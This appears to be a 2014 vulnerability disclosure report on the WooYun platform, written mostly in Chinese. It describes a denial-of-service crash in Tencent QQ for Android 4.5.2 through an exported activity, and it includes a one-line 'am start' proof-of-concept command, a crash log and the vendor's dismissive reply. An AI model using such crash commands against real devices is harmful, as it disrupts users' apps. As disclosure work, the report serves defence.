Tencent Messenger(QQ) Dos vulnerability(critical)

漏洞详情

披露状态:

2014-01-07: 细节已通知厂商并且等待厂商处理中
2014-01-08: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-04-04: 细节向公众公开

简要描述:

Tencent Messenger(QQ) Version: 4.5.2 critical Dos vulnerability need to be handled.

详细说明:

com.tencent.mobileqq.activity.QQBrowserDelegationActivity这个activity组件可被任意第三方程序调用导致进程crash.

Process Name: com.tencent.mobileqq

Version: 4.5.2

问题包:http://pan.baidu.com/s/1lEFzo



poc:

am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity



crash log:



E/AndroidRuntime( 2420): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity}: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1955)
E/AndroidRuntime( 2420): at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1980)
E/AndroidRuntime( 2420): at android.app.ActivityThread.access$600(ActivityThread.java:122)
E/AndroidRuntime( 2420): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1146)
E/AndroidRuntime( 2420): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime( 2420): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime( 2420): at android.app.ActivityThread.main(ActivityThread.java:4340)
E/AndroidRuntime( 2420): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime( 2420): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime( 2420): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:784)
E/AndroidRuntime( 2420): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:551)
E/AndroidRuntime( 2420): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime( 2420): Caused by: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420): at android.net.Uri$StringUri.<init>(Uri.java:464)
E/AndroidRuntime( 2420): at android.net.Uri$StringUri.<init>(Uri.java:454)
E/AndroidRuntime( 2420): at android.net.Uri.parse(Uri.java:426)
E/AndroidRuntime( 2420): at com.tencent.mtt.spcialcall.sdk.MttApi.loadUrlInMbWnd(MttApi.java:68)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.a(ProGuard:264)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.b(ProGuard:448)
E/AndroidRuntime( 2420): at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.onCreate(ProGuard:99)
E/AndroidRuntime( 2420): at android.app.Activity.performCreate(Activity.java:4465)
E/AndroidRuntime( 2420): at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1049)
E/AndroidRuntime( 2420): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1919)
E/AndroidRuntime( 2420): ... 11 more
W/ActivityManager( 78): Force finishing activity com.tencent.mobileqq/.activity.QQBrowserDelegationActivity
W/InputManagerService( 78): Window already focused, ignoring focus gain of: com.android.internal.view.IInputMethodClient$Stub$Proxy@41603f58
W/ThrottleService( 78): unable to find stats for iface rmnet0
I/WindowManager( 78): createSurface Window{414395e0 paused=false}: DRAW NOW PENDING
D/dalvikvm( 2420): GC_CONCURRENT freed 754K, 7% free 12872K/13767K, paused 4ms+17ms
W/ActivityManager( 78): Activity pause timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/NetworkManagementSocketTagger( 78): setKernelCountSet(10035, 0) failed with errno -2
D/dalvikvm( 2420): GC_CONCURRENT freed 727K, 6% free 13146K/13959K, paused 4ms+4ms
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711488865 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711488865
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711489146 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711489146
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711502275 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711502275
W/ActivityManager( 78): Activity destroy timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/ActivityManager( 78): Timeout executing service: ServiceRecord{41a68a38 com.tencent.mobileqq/.app.GuardService}
I/ActivityManager( 78): Crashing app skipping ANR: ProcessRecord{4145d828 2420:com.tencent.mobileqq/10035} Executing service com.tencent.mobileqq/.app.GuardService

漏洞证明:

DOS-QQ1.jpg





DOS-QQ2.jpg

修复方案:

版权声明:转载请注明来源 Pentest.mobi@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-01-08 10:07

厂商回复:

非常感谢您的报告,新版本已不存在报告中问题,感谢对腾讯业务的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价: